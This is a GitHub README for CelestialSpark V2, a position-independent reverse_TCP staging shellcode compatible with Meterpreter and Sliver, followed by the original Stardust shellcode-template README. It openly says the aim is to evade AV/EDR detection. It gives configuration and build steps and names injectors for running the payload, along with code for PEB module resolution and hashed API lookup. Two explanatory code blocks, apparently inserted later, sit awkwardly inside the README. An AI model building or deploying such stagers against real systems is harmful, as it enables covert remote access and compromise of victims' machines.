https://github.com/karkas66/celestialspark

Version 2 - A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

# CelestialSpark V2

A modern 64-bit position independent, Meterpreter- and Sliver-compatible reverse_TCP staging shellcode based on Cracked5pider's Stardust. Version 2 (03/2025).

```c++
#include
#include
#include

using namespace stardust;

// Define the IP address of your C2 stager
#define IP_STR "10.10.10.10"
// Define the port (443) of your C2 stager
#define PORT 443
```

## Why
I wanted to improve my understanding of position independent shellcode, plus... my Meterpreter reverse_TCP stager gets caught by a lot of AV/EDRs, and I was hoping to somehow get around the IoCs of the 15-year-old Meterpreter reverse_TCP shellcode generated by msfvenom.
Inspirations were:
- https://github.com/SherifEldeeb/TinyMet
- https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm

## How does it work
- the HTONS and HTONL functions, which are not available to the shellcode, have been hardcoded
- a custom inet_addr function was rewritten and implemented in main.cc
- socket creation and interaction functions have been imported from ws2_32.dll
- the Meterpreter staging logic has been copied from the original project and TinyMet
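The first two items above (byte-order conversion and dotted-quad parsing) as an added example; this is not the project's code. It shows freestanding htons/htonl equivalents, a stricter inet_addr-style parser that rejects malformed input instead of returning INADDR_NONE, and the reverse conversion an analyst uses to read a configured endpoint back out of the packed fields found in a sample. The names `pic_htons`, `pic_htonl`, `parse_ipv4` and `render_endpoint` are hypothetical, and the byte swaps assume a little-endian host, as on the x64 targets the page is about.

```cpp
#include <cstdint>
#include <cstdio>
#include <optional>
#include <string>
#include <string_view>

// Host-to-network byte order without ws2_32 or the CRT. x86/x64 hosts are
// little-endian and network order is big-endian, so this is a plain swap
// (hypothetical helper names, little-endian host assumed).
constexpr std::uint16_t pic_htons(std::uint16_t v) {
    return static_cast<std::uint16_t>((v << 8) | (v >> 8));
}

constexpr std::uint32_t pic_htonl(std::uint32_t v) {
    return (v >> 24) | ((v >> 8) & 0x0000FF00u) |
           ((v << 8) & 0x00FF0000u) | (v << 24);
}

// Parse "a.b.c.d" into a network-order 32-bit address. Unlike Winsock's
// inet_addr this rejects octets above 255, more than three digits per
// octet, the legacy "a.b" / "a" shorthand forms, and any trailing bytes.
std::optional<std::uint32_t> parse_ipv4(std::string_view s) {
    std::uint32_t packed = 0;   // host-order accumulator
    std::size_t i = 0;
    for (int octet = 0; octet < 4; ++octet) {
        if (i >= s.size() || s[i] < '0' || s[i] > '9') return std::nullopt;
        unsigned value = 0;
        std::size_t digits = 0;
        while (i < s.size() && s[i] >= '0' && s[i] <= '9') {
            value = value * 10 + static_cast<unsigned>(s[i] - '0');
            if (value > 255 || ++digits > 3) return std::nullopt;
            ++i;
        }
        packed = (packed << 8) | value;
        if (octet < 3) {                    // a separator must follow
            if (i >= s.size() || s[i] != '.') return std::nullopt;
            ++i;
        }
    }
    if (i != s.size()) return std::nullopt; // reject trailing garbage
    return pic_htonl(packed);
}

// Reverse direction for triage: given the packed network-order address and
// port as they sit in a sockaddr_in, render a readable "a.b.c.d:port".
std::string render_endpoint(std::uint32_t addr_be, std::uint16_t port_be) {
    const std::uint32_t a = pic_htonl(addr_be);  // the swap is its own inverse
    char buf[32];
    std::snprintf(buf, sizeof buf, "%u.%u.%u.%u:%u",
                  (a >> 24) & 0xFFu, (a >> 16) & 0xFFu,
                  (a >> 8) & 0xFFu, a & 0xFFu,
                  static_cast<unsigned>(pic_htons(port_be)));
    return buf;
}

int main() {
    // Constructed sample input: the placeholder address and port from the
    // configuration block above.
    if (auto addr = parse_ipv4("10.10.10.10")) {
        std::printf("packed: 0x%08X port: 0x%04X -> %s\n", *addr,
                    pic_htons(443), render_endpoint(*addr, pic_htons(443)).c_str());
    }
    return 0;
}
```

Because the parser validates each octet and the separators, a typo in `IP_STR` fails at startup rather than silently producing `INADDR_NONE` (which is itself a valid-looking address, 255.255.255.255).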

## Usage
- `git clone` the repository
- change the IP and port in `main.cc`
- disable the message box right before the stage 2 shellcode execution (if it bothers you)
- `make`
- use your favourite shellcode loader/injector. I successfully tested:
  - https://github.com/Cipher7/ChaiLdr
  - https://github.com/florylsk/ExecIT
  - https://github.com/3xpl01tc0d3r/ProcessInjection
  - the original Stardust Loader and Stomper written by [Cracked5pider](https://github.com/Cracked5pider)

End of the CelestialSpark section.
# Original Stardust README from here

# Stardust

A modern and easy to use 32/64-bit shellcode template.

- raw strings
- C++20 project
- uses compile time hashing with fnv1a for both function and module resolving

### Basic Usage

resolving modules from PEB using `resolve::module`:
```c++
if ( ! (( ntdll.handle = resolve::module( expr::hash_string( L"ntdll.dll" ) ) )) ) {
    return;
}

if ( ! (( kernel32.handle = resolve::module( expr::hash_string( L"kernel32.dll" ) ) )) ) {
    return;
}
```

resolving function apis using either `RESOLVE_API` macro or `resolve::api` function:
```c++
const auto user32 = kernel32.LoadLibraryA( symbol( "user32.dll" ) );

// module handles are uintptr_t in the instance structure (see include/common.h)
decltype( MessageBoxA ) * msgbox = RESOLVE_API( reinterpret_cast<uintptr_t>( user32 ), MessageBoxA );

msgbox( nullptr, symbol( "Hello world" ), symbol( "caption" ), MB_OK );
```
`RESOLVE_API` is a wrapper around `resolve::api` that automatically hashes the function name and casts the function pointer to the function type.

string hashing for both UTF-8 and UTF-16 using the compile time `expr::hash_string` function:
```c++
auto user32_hash = expr::hash_string( L"user32.dll" );
auto loadlibrary_hash = expr::hash_string( "LoadLibraryA" );
```
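Compile-time FNV-1a hashing over both narrow and UTF-16 strings, as an added example that is not Stardust's code: the hash is folded by the compiler so only the constant survives in the binary, and the same routine lets an analyst map a constant recovered from a sample back to an API name. It uses the standard 32-bit FNV-1a constants and feeds each UTF-16 code unit as two little-endian bytes; Stardust's exact variant (hash width, case handling, how wide characters are fed) is not stated on the page, so these values are not guaranteed to match `expr::hash_string`. The names `fnv1a32`, `name_for_hash` and the API list are constructed for this example.

```cpp
#include <array>
#include <cstdint>
#include <string_view>

// Standard 32-bit FNV-1a parameters.
constexpr std::uint32_t FNV1A32_OFFSET = 0x811C9DC5u;
constexpr std::uint32_t FNV1A32_PRIME  = 0x01000193u;

constexpr std::uint32_t fnv1a32_step(std::uint32_t h, std::uint8_t b) {
    return (h ^ b) * FNV1A32_PRIME;
}

// Narrow / UTF-8 strings: one byte per char.
constexpr std::uint32_t fnv1a32(std::string_view s) {
    std::uint32_t h = FNV1A32_OFFSET;
    for (char c : s) h = fnv1a32_step(h, static_cast<std::uint8_t>(c));
    return h;
}

// UTF-16 strings: each code unit is fed low byte first, i.e. the way a
// wide string sits in memory on a little-endian Windows host (an assumption
// of this example, not something the page states).
constexpr std::uint32_t fnv1a32(std::u16string_view s) {
    std::uint32_t h = FNV1A32_OFFSET;
    for (char16_t u : s) {
        h = fnv1a32_step(h, static_cast<std::uint8_t>(u & 0xFF));
        h = fnv1a32_step(h, static_cast<std::uint8_t>(u >> 8));
    }
    return h;
}

// Both overloads are constexpr, so these hashes are computed at compile
// time and the plaintext names never reach the output binary.
constexpr std::uint32_t kLoadLibraryA = fnv1a32("LoadLibraryA");
constexpr std::uint32_t kUser32       = fnv1a32(u"user32.dll");
static_assert(kLoadLibraryA != fnv1a32("LoadLibraryW"));

// Triage helper: a constructed list of API names taken from this page, used
// to turn a hash constant found in a sample back into a readable name.
constexpr std::array<std::string_view, 3> kKnownApis = {
    "LoadLibraryA", "MessageBoxA", "DbgPrint"};

constexpr std::string_view name_for_hash(std::uint32_t h) {
    for (std::string_view n : kKnownApis)
        if (fnv1a32(n) == h) return n;
    return {};   // empty view: not in the list
}
```

Usage: `name_for_hash(kLoadLibraryA)` yields `"LoadLibraryA"`, and `name_for_hash(0xDEADBEEF)` (a constructed unknown value) yields an empty view. Precomputing the table this way is how a detection engineer builds a hash-to-name lookup for resolver constants, and the two overloads make explicit that a UTF-16 module name hashes differently from its narrow spelling.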

raw strings support for both 32/64-bit by using the `symbol` function:
```c++
auto caption_string = symbol( "hello from stardust" );

user32.MessageBoxA( nullptr, caption_string, symbol( "message title" ), MB_OK );
```

easy to add new APIs and modules to the instance. Under `include/common.h` the following entry has to be made:
```c++
class instance {
    ...

    struct
    {
        uintptr_t handle; // base address to user32.dll

        struct {
            D_API( MessageBoxA );
            // more entries can be added here
        };
    } user32 = {
        RESOLVE_TYPE( MessageBoxA ),
        // more entries can be added here
    };

    ...
```
while the ``src/main.cc`` should resolve the base address of user32 and resolve the api pointer:
```c++
declfn instance::instance(
    void
) {
    ...
    //
    // resolve user32.dll from PEB if loaded
    if ( ! (( user32.handle = resolve::module( expr::hash_string( L"user32.dll" ) ) )) ) {
        return;
    }

    //
    // automatically resolve every entry imported
    // by user32 from the structure
    RESOLVE_IMPORT( user32 );
    ...
}
```

semi-friendly debugging capabilities via DbgPrint. The project needs to be compiled in debug mode for this, by specifying ``make debug``. Usage:
```c++
const auto user32 = kernel32.LoadLibraryA( symbol( "user32.dll" ) );

if ( user32 ) {
    DBG_PRINTF( "oh wow look we loaded user32.dll -> %p\n", user32 );
} else {
    DBG_PRINTF( "okay something went wrong. failed to load user32 :/\n" );
}

DBG_PRINTF( "running from %ls (Pid: %d)\n",
    NtCurrentPeb()->ProcessParameters->ImagePathName.Buffer,
    NtCurrentTeb()->ClientId.UniqueProcess );

DBG_PRINTF( "shellcode @ %p [%d bytes]\n", base.address, base.length );
```

### Building

Build in release mode:
```shell
$ make 20:17:26
-> compiling src/main.cc to main.x64.obj
-> compiling src/resolve.cc to resolve.x64.obj
compiling x64 project
/usr/bin/x86_64-w64-mingw32-ld: bin/stardust.x64.exe:.text: section below image base
-> compiling src/main.cc to main.x86.obj
-> compiling src/resolve.cc to resolve.x86.obj
compiling x86 project
/usr/bin/i686-w64-mingw32-ld: bin/stardust.x86.exe:.text: section below image base
$ ll bin 20:57:10
drwxr-xr-x spider spider 4.0 KB Thu Mar 13 20:57:10 2025 obj
.rw-r--r-- spider spider 752 B Thu Mar 13 20:57:10 2025 stardust.x64.bin
.rw-r--r-- spider spider 672 B Thu Mar 13 20:57:10 2025 stardust.x86.bin
```

Build in debug mode:
```shell
$ make debug 20:57:14
-> compiling src/main.cc to main.x64.obj
-> compiling src/resolve.cc to resolve.x64.obj
compiling x64 project
/usr/bin/x86_64-w64-mingw32-ld: bin/stardust.x64.exe:.text: section below image base
-> compiling src/main.cc to main.x86.obj
-> compiling src/resolve.cc to resolve.x86.obj
compiling x86 project
/usr/bin/i686-w64-mingw32-ld: bin/stardust.x86.exe:.text: section below image base
$ ll bin 20:58:13
drwxr-xr-x spider spider 4.0 KB Thu Mar 13 20:58:13 2025 obj
.rw-r--r-- spider spider 1.2 KB Thu Mar 13 20:58:13 2025 stardust.x64.bin
.rw-r--r-- spider spider 1.1 KB Thu Mar 13 20:58:13 2025 stardust.x86.bin
```

## Demo
x64:
![x64](./static/stomper.x64.png)

x86:
![x86](./static/stomper.x86.png)